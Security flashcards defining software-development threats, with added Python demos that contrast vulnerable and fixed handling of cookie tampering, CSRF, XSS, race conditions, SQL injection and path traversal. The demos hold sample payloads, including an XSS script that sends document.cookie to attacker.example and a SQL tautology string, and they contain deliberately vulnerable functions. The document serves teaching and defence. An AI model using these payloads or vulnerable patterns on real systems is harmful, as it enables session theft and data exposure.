Software Development Security Flashcards
Adware
Software that generates ads and installs itself on your computer when you download some other (usually free) program from the web, often bundled with that program's installer.
Aggregation
A relation, such as CONSISTS OF or CONTAINS, between types that defines the composition of a type from other types.
Application Programming Interface (API)
A set of calling conventions defining how a service is invoked through a software package.
Botnets
A network of infected "zombie" computers (bots) controlled remotely by a botherder, typically through a command-and-control channel. Botnets range in size from a handful of infected computers to hundreds of thousands or millions. Also known as a botherd.
Buffer overflow
An anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of a memory-safety violation; in native code the overwritten memory can include return addresses or function pointers, which is why overflows are frequently turned into code execution.
Cookie poisoning (manipulation)
Attacks that modify the contents of a cookie (for example a role, user ID, or price that the application stored on the client side) in order to bypass security mechanisms. The defence is to keep such state on the server, or to sign the cookie (and encrypt it if it is confidential) so that any tampering is detected before the value is trusted.
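An added example (not part of the original flashcards) of the defence described above: a cookie that carries a role field, read naively versus read only after an HMAC tag on it verifies. The server key, cookie layout and user names are constructed for the demonstration.

```python
import base64
import hashlib
import hmac

# Assumption (constructed for this example): a secret that exists only on the server.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def sign_cookie(value, key=SERVER_KEY):
    """Append an HMAC-SHA256 tag so that any change to `value` is detected."""
    tag = hmac.new(key, value.encode(), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(tag).decode().rstrip("=")


def verify_cookie(cookie, key=SERVER_KEY):
    """Return the cookie's value if its tag is valid, else None.

    The tag is base64url (never contains '.'), so the last '.' is the separator
    even when the value itself contains dots.
    """
    value, sep, _tag = cookie.rpartition(".")
    if not sep:
        return None
    # Recompute the whole signed cookie and compare in constant time.
    if not hmac.compare_digest(sign_cookie(value, key), cookie):
        return None
    return value


def parse_fields(value):
    """Split 'k=v;k2=v2' into a dict (the cookie layout used by this demo)."""
    return dict(item.split("=", 1) for item in value.split(";") if "=" in item)


def role_vulnerable(cookie):
    """Trusts whatever role the client sends: editing the cookie grants admin."""
    return parse_fields(cookie).get("role")


def role_safe(cookie):
    """Accepts a role only from a cookie whose tag verifies."""
    value = verify_cookie(cookie)
    return None if value is None else parse_fields(value).get("role")


# Constructed scenario: the server issues a signed cookie; the attacker edits the role.
ISSUED = sign_cookie("user=alice;role=user")
POISONED = ISSUED.replace("role=user", "role=admin")
UNSIGNED_POISONED = "user=alice;role=admin"
```

Signing stops tampering but not disclosure: the value is still readable by the client, so anything confidential also needs encryption, and the key must be rotated like any other credential.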
Covert channel
A channel of communication within a computer system, or network, that is not designed or intended to transfer information.
Cross Site Request Forgeries (CSRF)
A type of malicious exploit of a website whereby unauthorized commands are transmitted from the browser of a user that the website trusts, without that user's intent. It works because the browser automatically attaches the user's session cookies to requests that another site caused it to send; the server cannot tell a forged request from a genuine one unless it demands something the attacker's page cannot supply, such as a per-session anti-CSRF token.
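An added example, not from the original flashcards, of a state-changing handler with and without a synchronizer token. The session store, form layout and the forged request are constructed; the point is that the forged POST arrives with the victim's session but without the token that only the genuine page carries.

```python
import hmac
import secrets


def new_session(user):
    """Server-side session state with a random per-session CSRF token (constructed)."""
    return {"user": user, "csrf_token": secrets.token_hex(32)}


def render_transfer_form(session):
    """The genuine page embeds the token; a page on another origin cannot read it."""
    token = session["csrf_token"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer_vulnerable(session, form):
    """Relies on the session cookie alone, which the browser attaches to cross-site POSTs too."""
    return {"status": "ok", "from": session["user"],
            "to": form["to"], "amount": form["amount"]}


def handle_transfer_safe(session, form):
    """Rejects any request whose token does not match the one stored in the session."""
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return {"status": "rejected", "reason": "missing or invalid csrf_token"}
    return {"status": "ok", "from": session["user"],
            "to": form["to"], "amount": form["amount"]}


def extract_token(html_form):
    """What the legitimate browser flow does: read the token back out of the rendered form."""
    marker = 'name="csrf_token" value="'
    start = html_form.index(marker) + len(marker)
    return html_form[start:html_form.index('"', start)]


# Constructed forged request: a form auto-submitted by an attacker-controlled page.
# It reaches the server with the victim's session cookie, but cannot carry the token.
FORGED = {"to": "attacker", "amount": "1000"}
```

Modern deployments add `SameSite` cookie attributes and origin checks on top of the token; the token remains the check that works regardless of browser behaviour.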
Cross-Site Scripting (XSS)
A type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users; the script runs in the vulnerable site's origin with the victim's session, so it can read cookies, issue requests as the victim, or rewrite the page. The root cause is untrusted data placed into HTML (or an attribute, URL, or script context) without encoding it for that context.
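An added example, not part of the original page, showing stored XSS in a comment renderer and the context-appropriate fix with `html.escape`. The payloads and markup are constructed for the demonstration.

```python
import html


def render_comment_vulnerable(comment):
    """Inserts user text straight into the HTML body."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment):
    """HTML-encodes the text so the browser shows it as characters, not markup."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_attr_safe(comment):
    """Same data inside a quoted attribute: quotes must be encoded too (quote=True)."""
    return '<input value="' + html.escape(comment, quote=True) + '">'


def has_executable_markup(page):
    """Crude check used only by this demo: does the page contain a raw <script> tag?"""
    return "<script" in page.lower()


# Constructed stored-XSS payload: sends the viewer's cookie to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
# Constructed attribute-context payload: breaks out of value="..." to add an event handler.
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'
```

Body-context escaping does not cover every sink: data placed inside a `<script>` block, a URL, or an inline style needs the encoder for that context, which is why template engines with automatic contextual escaping are preferred over hand-built strings.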
Dangling pointer
A pointer that does not point to a valid object of the appropriate type, typically because the object it referred to has been freed or has gone out of scope while the pointer is still in use. Dereferencing it is a use-after-free, a memory-safety flaw that is often exploitable.
Data hiding
A software development technique specifically used in object-oriented programming (OOP) to hide internal object details (data members). Data hiding ensures exclusive data access to class members and protects object integrity by preventing unintended or intended changes.
Denial of Service (DoS)
The unauthorized prevention of authorized access to resources or the delaying of time-critical operations.
Distributed Denial of Service (DDoS)
Multiple computers (commonly the members of a botnet) flooding a Web site or service with so many requests that it slows down or crashes.
Fast flux botnets
A DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies; the DNS records for the malicious domain have very short TTLs and rotate through the IP addresses of the bots.
Garbage collection
A language mechanism that automatically deallocates memory for objects that are not accessible or referenced.
HTTP Response Splitting
A form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values that are written into HTTP response headers. A carriage return and line feed (CR/LF) in such a value ends the header line, so the attacker can terminate the first response and supply a second, fully attacker-controlled one. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.
Keystroke logging
The action of recording (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.
Open source
A philosophy that promotes free redistribution and access to an end product’s design and implementation details.
Pharming
An attack intended to redirect a website's traffic to another, bogus site, usually by corrupting name resolution (a poisoned DNS cache or resolver, or an altered hosts file) so that the victim reaches the bogus site even when typing the correct address.
Phishing
The act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.
Race condition
A type of flaw in an electronic or software system where the output depends on the sequence or timing of other uncontrollable events. A common form is time-of-check to time-of-use (TOCTOU): one party checks a condition (a balance, a file's permissions) and then acts on it, while another party changes the state in between.
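An added example, not part of the original flashcards, of a check-then-act race on an account balance. The account and the sleep that stands in for a database round trip are constructed so that the race reproduces reliably; the safe version holds a lock across the check and the update.

```python
import threading
import time


class Account:
    """Constructed shared resource: a balance two threads withdraw from."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_vulnerable(self, amount):
        """Check, then act, with nothing stopping another thread in between.

        The sleep stands in for real work (a DB round trip) between the time of
        check and the time of use and makes the interleaving reliable.
        """
        if self.balance >= amount:          # time of check
            time.sleep(0.05)
            self.balance -= amount          # time of use
            return True
        return False

    def withdraw_safe(self, amount):
        """The lock makes check and update one atomic step."""
        with self.lock:
            if self.balance >= amount:
                time.sleep(0.05)
                self.balance -= amount
                return True
            return False


def run_concurrent(method, amount, n_threads):
    """Start n threads that each call `method(amount)` and wait for all of them."""
    threads = [threading.Thread(target=method, args=(amount,)) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def demo():
    """Two withdrawals of 100 from a balance of 100; returns (vulnerable, safe) balances."""
    vuln = Account(100)
    run_concurrent(vuln.withdraw_vulnerable, 100, 2)
    safe = Account(100)
    run_concurrent(safe.withdraw_safe, 100, 2)
    return vuln.balance, safe.balance
```

The same pattern applies across processes: a file permission check followed by an open, or a "does this username exist" query followed by an insert, needs an atomic operation (open with the right flags, a unique constraint) rather than a separate check.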
Remote Access Trojans (RATs)
A malware program that includes a back door for administrative control over the target computer.
Rootkits
A stealthy type of software, often malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer.
Social engineering
The art of manipulating people into performing actions or divulging confidential information.
SPAM
The use of electronic messaging systems to send unsolicited bulk messages, especially advertising, indiscriminately.
Spear phishing
Phishing attempts directed at specific individuals or companies. Attackers may gather personal information about their target to increase their probability of success.
SQL injection
A technique often used to attack data-driven applications. Portions of SQL syntax are placed in an input field so that the application, which builds its query by concatenating that input, passes a newly formed rogue SQL command to the database (e.g. to dump the database contents to the attacker). The fix is to keep data and code separate by binding input as parameters rather than splicing it into the statement.
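An added example, not from the original page, of the same lookup written with string concatenation and with a bound parameter, run against a constructed in-memory SQLite table. The table contents and the tautology payload are invented for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data: two users with a secret each, in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice-secret"), ("bob", "bob-secret")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """Splices the input into the statement, so the input can rewrite the WHERE clause."""
    query = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, name):
    """Binds the input as a parameter: the driver sends it as a value, never as SQL."""
    return conn.execute(
        "SELECT name, secret FROM users WHERE name = ?", (name,)
    ).fetchall()


# Constructed attacker input: closes the quoted string and adds a tautology, turning
# the statement into  ... WHERE name = 'x' OR '1'='1'  which matches every row.
PAYLOAD = "x' OR '1'='1"


def demo():
    """Run both lookups with the payload and return their result sets."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "safe": lookup_safe(conn, PAYLOAD),
    }
```

Parameter binding covers values only; table or column names chosen by the user still have to be checked against an allow-list, because they cannot be bound.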
URL manipulation
By manipulating certain parts of a URL (the path, a query parameter, or an object identifier), an attacker can get a web server to deliver pages or files they are not supposed to have access to, for example by changing an ID in the query string to another user's, or by inserting "../" segments into a path so that the server reads outside its web root.
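An added example, not part of the original flashcards, of the path form of this attack: a file handler that joins the URL path onto the web root, beside one that resolves the path first and checks it still lies under the root. The directory layout is constructed in a temporary directory so the example runs offline.

```python
import os
import tempfile


def make_site():
    """Constructed layout: <tmp>/www is the web root, <tmp>/secret is outside it."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "www"))
    os.makedirs(os.path.join(base, "secret"))
    with open(os.path.join(base, "www", "index.html"), "w") as f:
        f.write("<h1>public</h1>")
    with open(os.path.join(base, "secret", "config.txt"), "w") as f:
        f.write("db_password=hunter2")
    return os.path.join(base, "www")


def serve_vulnerable(root, requested_path):
    """Joins the URL path onto the root: '..' segments walk out of the root, and an
    absolute path makes os.path.join discard the root entirely."""
    with open(os.path.join(root, requested_path)) as f:
        return f.read()


def serve_safe(root, requested_path):
    """Resolves '..' and symlinks first, then checks the result is still under the root."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, requested_path.lstrip("/")))
    if os.path.commonpath([root_real, target]) != root_real:
        return None  # outside the web root: treat exactly like a missing file
    if not os.path.isfile(target):
        return None
    with open(target) as f:
        return f.read()
```

Returning the same "not found" result for both a missing file and a rejected path avoids telling the attacker which paths exist outside the root.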
Web applets
Small programs (classically Java applets) that provide interactive features to web applications that cannot be provided by HTML alone. They can capture mouse input and also have controls like buttons or check boxes, and in response to user actions an applet can change the graphic content it displays. Because an applet is code from the web site executing on the client, browsers ran applets inside a sandbox; modern browsers no longer support Java applets at all.